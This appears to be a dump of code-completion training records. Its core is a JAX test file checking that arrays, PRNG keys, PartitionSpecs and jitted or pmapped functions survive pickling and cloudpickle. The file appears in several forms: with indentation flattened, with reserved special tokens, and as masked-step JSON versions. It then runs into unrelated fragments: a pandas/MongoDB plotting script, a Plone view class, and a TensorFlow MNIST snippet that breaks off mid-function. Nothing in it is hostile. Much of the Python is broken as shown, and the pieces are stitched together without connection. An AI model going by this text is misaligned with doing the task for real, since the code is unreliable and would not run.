k1 = jax.random.PRNGKey(72)
s = pickle.dumps(k1)
k2 = pickle.loads(s)
self.assertEqual(k1.dtype, k2.dtype)
self.assertArraysEqual(jax.random.key_data(k1), jax.random.
key_data(k2))
@parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(
None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,
'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',
'y')),))
def testPickleOfPartitionSpecs(self, partition_spec):
restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))
self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)
self.assertTupleEqual(partition_spec, restored_partition_spec)
def testPickleX64(self):
with jax.experimental.enable_x64():
x = jnp.array(4.0, dtype='float64')
s = pickle.dumps(x)
with jax.experimental.disable_x64():
y = pickle.loads(s)
self.assertEqual(x.dtype, jnp.float64)
self.assertArraysEqual(x, y, check_dtypes=False)
self.assertEqual(y.dtype, jnp.float32)
self.assertEqual(y.aval.dtype, jnp.float32)
self.assertIsInstance(y, type(x))
def testPickleTracerError(self):
with self.assertRaises(core.ConcretizationTypeError):
jax.jit(pickle.dumps)(0)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
try:
import cloudpickle
except ImportError:
cloudpickle = None
<|reserved_special_token_0|>
config.parse_flags_with_absl()
class CloudpickleTest(jtu.JaxTestCase):
@unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')
def testPickleOfJittedFunctions(self):
@jax.jit
def f(x, y):
return x * y
@jax.jit
def g(z):
return f(z, z + 77)
expected = g(32)
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(32)
self.assertEqual(expected, actual)
@unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')
def testPickleOfPmappedFunctions(self):
@jax.pmap
def f(x, y):
return x * y
@jax.pmap
def g(z):
return f(z, z + 77)
expected = g(jnp.asarray([[32]]))
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(jnp.asarray([[32]]))
self.assertEqual(expected, actual)
class PickleTest(jtu.JaxTestCase):
def testPickleOfDeviceArray(self):
x = jnp.arange(10.0)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
def testPickleOfDeviceArrayWeakType(self):
x = jnp.array(4.0)
self.assertEqual(x.aval.weak_type, True)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
@jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])
def testPickleOfKeyArray(self, prng_name):
with jax.default_prng_impl(prng_name):
k1 = jax.random.PRNGKey(72)
s = pickle.dumps(k1)
k2 = pickle.loads(s)
self.assertEqual(k1.dtype, k2.dtype)
self.assertArraysEqual(jax.random.key_data(k1), jax.random.
key_data(k2))
@parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(
None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,
'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',
'y')),))
def testPickleOfPartitionSpecs(self, partition_spec):
restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))
self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)
self.assertTupleEqual(partition_spec, restored_partition_spec)
def testPickleX64(self):
with jax.experimental.enable_x64():
x = jnp.array(4.0, dtype='float64')
s = pickle.dumps(x)
with jax.experimental.disable_x64():
y = pickle.loads(s)
self.assertEqual(x.dtype, jnp.float64)
self.assertArraysEqual(x, y, check_dtypes=False)
self.assertEqual(y.dtype, jnp.float32)
self.assertEqual(y.aval.dtype, jnp.float32)
self.assertIsInstance(y, type(x))
def testPickleTracerError(self):
with self.assertRaises(core.ConcretizationTypeError):
jax.jit(pickle.dumps)(0)
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
<|reserved_special_token_1|>
# Copyright 2021 The JAX Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for interoperability between JAX and pickling libraries."""
import pickle
import unittest
from absl.testing import absltest
from absl.testing import parameterized
try:
import cloudpickle
except ImportError:
cloudpickle = None
import jax
from jax import core
from jax import numpy as jnp
from jax.config import config
from jax.interpreters import pxla
from jax._src import test_util as jtu
config.parse_flags_with_absl()
class CloudpickleTest(jtu.JaxTestCase):
@unittest.skipIf(cloudpickle is None, "Requires cloudpickle")
def testPickleOfJittedFunctions(self):
@jax.jit
def f(x, y):
return x * y
@jax.jit
def g(z):
return f(z, z + 77) # noqa: F821
expected = g(32)
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(32)
self.assertEqual(expected, actual)
@unittest.skipIf(cloudpickle is None, "Requires cloudpickle")
def testPickleOfPmappedFunctions(self):
@jax.pmap
def f(x, y):
return x * y
@jax.pmap
def g(z):
return f(z, z + 77) # noqa: F821
expected = g(jnp.asarray([[32]]))
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(jnp.asarray([[32]]))
self.assertEqual(expected, actual)
class PickleTest(jtu.JaxTestCase):
def testPickleOfDeviceArray(self):
x = jnp.arange(10.0)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
def testPickleOfDeviceArrayWeakType(self):
x = jnp.array(4.0)
self.assertEqual(x.aval.weak_type, True)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
@jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])
def testPickleOfKeyArray(self, prng_name):
with jax.default_prng_impl(prng_name):
k1 = jax.random.PRNGKey(72)
s = pickle.dumps(k1)
k2 = pickle.loads(s)
self.assertEqual(k1.dtype, k2.dtype)
self.assertArraysEqual(jax.random.key_data(k1),
jax.random.key_data(k2))
@parameterized.parameters(
(pxla.PartitionSpec(),),
(pxla.PartitionSpec(None),),
(pxla.PartitionSpec('x', None),),
(pxla.PartitionSpec(None, 'y'),),
(pxla.PartitionSpec('x', 'y'),),
(pxla.PartitionSpec(('x', 'y'),),),
)
def testPickleOfPartitionSpecs(self, partition_spec):
restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))
self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)
self.assertTupleEqual(partition_spec, restored_partition_spec)
def testPickleX64(self):
with jax.experimental.enable_x64():
x = jnp.array(4.0, dtype='float64')
s = pickle.dumps(x)
with jax.experimental.disable_x64():
y = pickle.loads(s)
self.assertEqual(x.dtype, jnp.float64)
self.assertArraysEqual(x, y, check_dtypes=False)
self.assertEqual(y.dtype, jnp.float32)
self.assertEqual(y.aval.dtype, jnp.float32)
self.assertIsInstance(y, type(x))
def testPickleTracerError(self):
with self.assertRaises(core.ConcretizationTypeError):
jax.jit(pickle.dumps)(0)
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
flexible
|
{
"blob_id": "79c8e87e1d247eef8dd1ca8e307bbe6d25bf48e2",
"index": 8172,
"step-1": "<mask token>\n\n\nclass PickleTest(jtu.JaxTestCase):\n\n def testPickleOfDeviceArray(self):\n x = jnp.arange(10.0)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n def testPickleOfDeviceArrayWeakType(self):\n x = jnp.array(4.0)\n self.assertEqual(x.aval.weak_type, True)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n @jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])\n def testPickleOfKeyArray(self, prng_name):\n with jax.default_prng_impl(prng_name):\n k1 = jax.random.PRNGKey(72)\n s = pickle.dumps(k1)\n k2 = pickle.loads(s)\n self.assertEqual(k1.dtype, k2.dtype)\n self.assertArraysEqual(jax.random.key_data(k1), jax.random.\n key_data(k2))\n\n @parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(\n None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,\n 'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',\n 'y')),))\n def testPickleOfPartitionSpecs(self, partition_spec):\n restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))\n self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)\n self.assertTupleEqual(partition_spec, restored_partition_spec)\n\n def testPickleX64(self):\n with jax.experimental.enable_x64():\n x = jnp.array(4.0, dtype='float64')\n s = pickle.dumps(x)\n with jax.experimental.disable_x64():\n y = pickle.loads(s)\n self.assertEqual(x.dtype, jnp.float64)\n self.assertArraysEqual(x, y, check_dtypes=False)\n self.assertEqual(y.dtype, jnp.float32)\n self.assertEqual(y.aval.dtype, jnp.float32)\n self.assertIsInstance(y, type(x))\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CloudpickleTest(jtu.JaxTestCase):\n <mask token>\n\n @unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')\n def testPickleOfPmappedFunctions(self):\n\n @jax.pmap\n def f(x, y):\n return x * y\n\n @jax.pmap\n def g(z):\n return f(z, z + 77)\n expected = g(jnp.asarray([[32]]))\n s = cloudpickle.dumps(g)\n del f, g\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(jnp.asarray([[32]]))\n self.assertEqual(expected, actual)\n\n\nclass PickleTest(jtu.JaxTestCase):\n\n def testPickleOfDeviceArray(self):\n x = jnp.arange(10.0)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n def testPickleOfDeviceArrayWeakType(self):\n x = jnp.array(4.0)\n self.assertEqual(x.aval.weak_type, True)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n @jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])\n def testPickleOfKeyArray(self, prng_name):\n with jax.default_prng_impl(prng_name):\n k1 = jax.random.PRNGKey(72)\n s = pickle.dumps(k1)\n k2 = pickle.loads(s)\n self.assertEqual(k1.dtype, k2.dtype)\n self.assertArraysEqual(jax.random.key_data(k1), jax.random.\n key_data(k2))\n\n @parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(\n None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,\n 'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',\n 'y')),))\n def testPickleOfPartitionSpecs(self, partition_spec):\n restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))\n self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)\n self.assertTupleEqual(partition_spec, restored_partition_spec)\n\n def testPickleX64(self):\n with jax.experimental.enable_x64():\n x = jnp.array(4.0, dtype='float64')\n s = pickle.dumps(x)\n with jax.experimental.disable_x64():\n y = pickle.loads(s)\n self.assertEqual(x.dtype, jnp.float64)\n self.assertArraysEqual(x, y, check_dtypes=False)\n self.assertEqual(y.dtype, jnp.float32)\n self.assertEqual(y.aval.dtype, jnp.float32)\n self.assertIsInstance(y, type(x))\n\n def testPickleTracerError(self):\n with self.assertRaises(core.ConcretizationTypeError):\n jax.jit(pickle.dumps)(0)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CloudpickleTest(jtu.JaxTestCase):\n\n @unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')\n def testPickleOfJittedFunctions(self):\n\n @jax.jit\n def f(x, y):\n return x * y\n\n @jax.jit\n def g(z):\n return f(z, z + 77)\n expected = g(32)\n s = cloudpickle.dumps(g)\n del f, g\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(32)\n self.assertEqual(expected, actual)\n\n @unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')\n def testPickleOfPmappedFunctions(self):\n\n @jax.pmap\n def f(x, y):\n return x * y\n\n @jax.pmap\n def g(z):\n return f(z, z + 77)\n expected = g(jnp.asarray([[32]]))\n s = cloudpickle.dumps(g)\n del f, g\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(jnp.asarray([[32]]))\n self.assertEqual(expected, actual)\n\n\nclass PickleTest(jtu.JaxTestCase):\n\n def testPickleOfDeviceArray(self):\n x = jnp.arange(10.0)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n def testPickleOfDeviceArrayWeakType(self):\n x = jnp.array(4.0)\n self.assertEqual(x.aval.weak_type, True)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n @jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])\n def testPickleOfKeyArray(self, prng_name):\n with jax.default_prng_impl(prng_name):\n k1 = jax.random.PRNGKey(72)\n s = pickle.dumps(k1)\n k2 = pickle.loads(s)\n self.assertEqual(k1.dtype, k2.dtype)\n self.assertArraysEqual(jax.random.key_data(k1), jax.random.\n key_data(k2))\n\n @parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(\n None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,\n 'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',\n 'y')),))\n def testPickleOfPartitionSpecs(self, partition_spec):\n restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))\n self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)\n self.assertTupleEqual(partition_spec, restored_partition_spec)\n\n def testPickleX64(self):\n with jax.experimental.enable_x64():\n x = jnp.array(4.0, dtype='float64')\n s = pickle.dumps(x)\n with jax.experimental.disable_x64():\n y = pickle.loads(s)\n self.assertEqual(x.dtype, jnp.float64)\n self.assertArraysEqual(x, y, check_dtypes=False)\n self.assertEqual(y.dtype, jnp.float32)\n self.assertEqual(y.aval.dtype, jnp.float32)\n self.assertIsInstance(y, type(x))\n\n def testPickleTracerError(self):\n with self.assertRaises(core.ConcretizationTypeError):\n jax.jit(pickle.dumps)(0)\n\n\n<mask token>\n",
"step-4": "<mask token>\ntry:\n import cloudpickle\nexcept ImportError:\n cloudpickle = None\n<mask token>\nconfig.parse_flags_with_absl()\n\n\nclass CloudpickleTest(jtu.JaxTestCase):\n\n @unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')\n def testPickleOfJittedFunctions(self):\n\n @jax.jit\n def f(x, y):\n return x * y\n\n @jax.jit\n def g(z):\n return f(z, z + 77)\n expected = g(32)\n s = cloudpickle.dumps(g)\n del f, g\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(32)\n self.assertEqual(expected, actual)\n\n @unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')\n def testPickleOfPmappedFunctions(self):\n\n @jax.pmap\n def f(x, y):\n return x * y\n\n @jax.pmap\n def g(z):\n return f(z, z + 77)\n expected = g(jnp.asarray([[32]]))\n s = cloudpickle.dumps(g)\n del f, g\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(jnp.asarray([[32]]))\n self.assertEqual(expected, actual)\n\n\nclass PickleTest(jtu.JaxTestCase):\n\n def testPickleOfDeviceArray(self):\n x = jnp.arange(10.0)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n def testPickleOfDeviceArrayWeakType(self):\n x = jnp.array(4.0)\n self.assertEqual(x.aval.weak_type, True)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n @jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])\n def testPickleOfKeyArray(self, prng_name):\n with jax.default_prng_impl(prng_name):\n k1 = jax.random.PRNGKey(72)\n s = pickle.dumps(k1)\n k2 = pickle.loads(s)\n self.assertEqual(k1.dtype, k2.dtype)\n self.assertArraysEqual(jax.random.key_data(k1), jax.random.\n key_data(k2))\n\n @parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(\n None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,\n 'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',\n 'y')),))\n def testPickleOfPartitionSpecs(self, partition_spec):\n restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))\n self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)\n self.assertTupleEqual(partition_spec, restored_partition_spec)\n\n def testPickleX64(self):\n with jax.experimental.enable_x64():\n x = jnp.array(4.0, dtype='float64')\n s = pickle.dumps(x)\n with jax.experimental.disable_x64():\n y = pickle.loads(s)\n self.assertEqual(x.dtype, jnp.float64)\n self.assertArraysEqual(x, y, check_dtypes=False)\n self.assertEqual(y.dtype, jnp.float32)\n self.assertEqual(y.aval.dtype, jnp.float32)\n self.assertIsInstance(y, type(x))\n\n def testPickleTracerError(self):\n with self.assertRaises(core.ConcretizationTypeError):\n jax.jit(pickle.dumps)(0)\n\n\nif __name__ == '__main__':\n absltest.main(testLoader=jtu.JaxTestLoader())\n",
"step-5": "# Copyright 2021 The JAX Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for interoperability between JAX and pickling libraries.\"\"\"\n\nimport pickle\nimport unittest\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\n\ntry:\n import cloudpickle\nexcept ImportError:\n cloudpickle = None\n\nimport jax\nfrom jax import core\nfrom jax import numpy as jnp\nfrom jax.config import config\nfrom jax.interpreters import pxla\nfrom jax._src import test_util as jtu\n\nconfig.parse_flags_with_absl()\n\n\nclass CloudpickleTest(jtu.JaxTestCase):\n\n @unittest.skipIf(cloudpickle is None, \"Requires cloudpickle\")\n def testPickleOfJittedFunctions(self):\n\n @jax.jit\n def f(x, y):\n return x * y\n\n @jax.jit\n def g(z):\n return f(z, z + 77) # noqa: F821\n\n expected = g(32)\n s = cloudpickle.dumps(g)\n del f, g\n\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(32)\n self.assertEqual(expected, actual)\n\n @unittest.skipIf(cloudpickle is None, \"Requires cloudpickle\")\n def testPickleOfPmappedFunctions(self):\n\n @jax.pmap\n def f(x, y):\n return x * y\n\n @jax.pmap\n def g(z):\n return f(z, z + 77) # noqa: F821\n\n expected = g(jnp.asarray([[32]]))\n s = cloudpickle.dumps(g)\n del f, g\n\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(jnp.asarray([[32]]))\n self.assertEqual(expected, actual)\n\n\nclass PickleTest(jtu.JaxTestCase):\n\n def testPickleOfDeviceArray(self):\n x = jnp.arange(10.0)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n def testPickleOfDeviceArrayWeakType(self):\n x = jnp.array(4.0)\n self.assertEqual(x.aval.weak_type, True)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n @jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])\n def testPickleOfKeyArray(self, prng_name):\n with jax.default_prng_impl(prng_name):\n k1 = jax.random.PRNGKey(72)\n s = pickle.dumps(k1)\n k2 = pickle.loads(s)\n self.assertEqual(k1.dtype, k2.dtype)\n self.assertArraysEqual(jax.random.key_data(k1),\n jax.random.key_data(k2))\n\n @parameterized.parameters(\n (pxla.PartitionSpec(),),\n (pxla.PartitionSpec(None),),\n (pxla.PartitionSpec('x', None),),\n (pxla.PartitionSpec(None, 'y'),),\n (pxla.PartitionSpec('x', 'y'),),\n (pxla.PartitionSpec(('x', 'y'),),),\n )\n def testPickleOfPartitionSpecs(self, partition_spec):\n restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))\n self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)\n self.assertTupleEqual(partition_spec, restored_partition_spec)\n\n def testPickleX64(self):\n with jax.experimental.enable_x64():\n x = jnp.array(4.0, dtype='float64')\n s = pickle.dumps(x)\n\n with jax.experimental.disable_x64():\n y = pickle.loads(s)\n\n self.assertEqual(x.dtype, jnp.float64)\n self.assertArraysEqual(x, y, check_dtypes=False)\n self.assertEqual(y.dtype, jnp.float32)\n self.assertEqual(y.aval.dtype, jnp.float32)\n self.assertIsInstance(y, type(x))\n\n def testPickleTracerError(self):\n with self.assertRaises(core.ConcretizationTypeError):\n jax.jit(pickle.dumps)(0)\n\nif __name__ == \"__main__\":\n absltest.main(testLoader=jtu.JaxTestLoader())\n",
"step-ids": [
6,
9,
10,
11,
13
]
}
|
[
6,
9,
10,
11,
13
] |
import pandas as pd
from pymongo import MongoClient
import numpy as np
mongo_client = MongoClient('localhost', 27018)
mongo_db = mongo_client['ProjetoIN242']
mongo_collection = mongo_db['contadorpessoas']
query = mongo_collection.find({})
df = pd.DataFrame.from_records(query)
df_filtro = df[['Entrada','Dia', 'Quantidade de pessoas']] ##seleção de colunas
df_filtro.groupby('Dia')['Quantidade de pessoas'].mean().plot(x='Dia', y= 'Quantidade de pessoas')
|
normal
|
{
"blob_id": "9d4559a363c4fd6f9a22dc493a7aaa0a22386c21",
"index": 8071,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndf_filtro.groupby('Dia')['Quantidade de pessoas'].mean().plot(x='Dia', y=\n 'Quantidade de pessoas')\n",
"step-3": "<mask token>\nmongo_client = MongoClient('localhost', 27018)\nmongo_db = mongo_client['ProjetoIN242']\nmongo_collection = mongo_db['contadorpessoas']\nquery = mongo_collection.find({})\ndf = pd.DataFrame.from_records(query)\ndf_filtro = df[['Entrada', 'Dia', 'Quantidade de pessoas']]\ndf_filtro.groupby('Dia')['Quantidade de pessoas'].mean().plot(x='Dia', y=\n 'Quantidade de pessoas')\n",
"step-4": "import pandas as pd\nfrom pymongo import MongoClient\nimport numpy as np\nmongo_client = MongoClient('localhost', 27018)\nmongo_db = mongo_client['ProjetoIN242']\nmongo_collection = mongo_db['contadorpessoas']\nquery = mongo_collection.find({})\ndf = pd.DataFrame.from_records(query)\ndf_filtro = df[['Entrada', 'Dia', 'Quantidade de pessoas']]\ndf_filtro.groupby('Dia')['Quantidade de pessoas'].mean().plot(x='Dia', y=\n 'Quantidade de pessoas')\n",
"step-5": "import pandas as pd\nfrom pymongo import MongoClient\nimport numpy as np\n\nmongo_client = MongoClient('localhost', 27018)\nmongo_db = mongo_client['ProjetoIN242']\nmongo_collection = mongo_db['contadorpessoas']\n\nquery = mongo_collection.find({})\n\ndf = pd.DataFrame.from_records(query)\n\ndf_filtro = df[['Entrada','Dia', 'Quantidade de pessoas']] ##seleção de colunas\n\ndf_filtro.groupby('Dia')['Quantidade de pessoas'].mean().plot(x='Dia', y= 'Quantidade de pessoas')\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class AssetRepositoryView(BrowserView):
<|reserved_special_token_0|>
def contained_items(self, uid):
stack = api.content.get(UID=uid)
return stack.restrictedTraverse('@@folderListing')()
def item_index(self, uid):
return len(self.contained_items(uid))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class AssetRepositoryView(BrowserView):
<|reserved_special_token_0|>
def contained_items(self, uid):
stack = api.content.get(UID=uid)
return stack.restrictedTraverse('@@folderListing')()
def item_index(self, uid):
return len(self.contained_items(uid))
def preview_image(self, uid):
images = self.contained_items(uid)
preview = None
if len(images):
first_item = images[0].getObject()
if IImage.providedBy(first_item):
preview = first_item
return preview
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class AssetRepositoryView(BrowserView):
""" Folderish content page default view """
def contained_items(self, uid):
stack = api.content.get(UID=uid)
return stack.restrictedTraverse('@@folderListing')()
def item_index(self, uid):
return len(self.contained_items(uid))
def preview_image(self, uid):
images = self.contained_items(uid)
preview = None
if len(images):
first_item = images[0].getObject()
if IImage.providedBy(first_item):
preview = first_item
return preview
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from Products.Five.browser import BrowserView
from plone import api
from plone.app.contenttypes.interfaces import IImage
class AssetRepositoryView(BrowserView):
""" Folderish content page default view """
def contained_items(self, uid):
stack = api.content.get(UID=uid)
return stack.restrictedTraverse('@@folderListing')()
def item_index(self, uid):
return len(self.contained_items(uid))
def preview_image(self, uid):
images = self.contained_items(uid)
preview = None
if len(images):
first_item = images[0].getObject()
if IImage.providedBy(first_item):
preview = first_item
return preview
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""Module providing views for asset storage folder"""
from Products.Five.browser import BrowserView
from plone import api
from plone.app.contenttypes.interfaces import IImage
class AssetRepositoryView(BrowserView):
""" Folderish content page default view """
def contained_items(self, uid):
stack = api.content.get(UID=uid)
return stack.restrictedTraverse('@@folderListing')()
def item_index(self, uid):
return len(self.contained_items(uid))
def preview_image(self, uid):
images = self.contained_items(uid)
preview = None
if len(images):
first_item = images[0].getObject()
if IImage.providedBy(first_item):
preview = first_item
return preview
|
flexible
|
{
"blob_id": "70c20b38edb01552a8c7531b3e87a9302ffaf6c5",
"index": 5062,
"step-1": "<mask token>\n\n\nclass AssetRepositoryView(BrowserView):\n <mask token>\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass AssetRepositoryView(BrowserView):\n <mask token>\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-3": "<mask token>\n\n\nclass AssetRepositoryView(BrowserView):\n \"\"\" Folderish content page default view \"\"\"\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-4": "<mask token>\nfrom Products.Five.browser import BrowserView\nfrom plone import api\nfrom plone.app.contenttypes.interfaces import IImage\n\n\nclass AssetRepositoryView(BrowserView):\n \"\"\" Folderish content page default view \"\"\"\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Module providing views for asset storage folder\"\"\"\nfrom Products.Five.browser import BrowserView\nfrom plone import api\nfrom plone.app.contenttypes.interfaces import IImage\n\nclass AssetRepositoryView(BrowserView):\n \"\"\" Folderish content page default view \"\"\"\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True, reshape=False)
def fully_connected(prev_layer, num_units, batch_norm, is_training=False):
layer = tf.layers.dense(prev_layer, num_units, use_bias=False, activation=None)
if batch_norm:
layer = tf.layers.batch_normalization(layer, training=is_training)
layer = tf.nn.relu(layer)
return layer
def conv_layer(prev_layer, layer_depth, batch_norm, is_training=False):
if layer_depth % 3 == 0:
strides = 2
else:
strides = 1
conv_layer = tf.layers.conv2d(prev_layer, layer_depth*4, 3, strides, 'same', use_bias=False, activation=None)
if batch_norm:
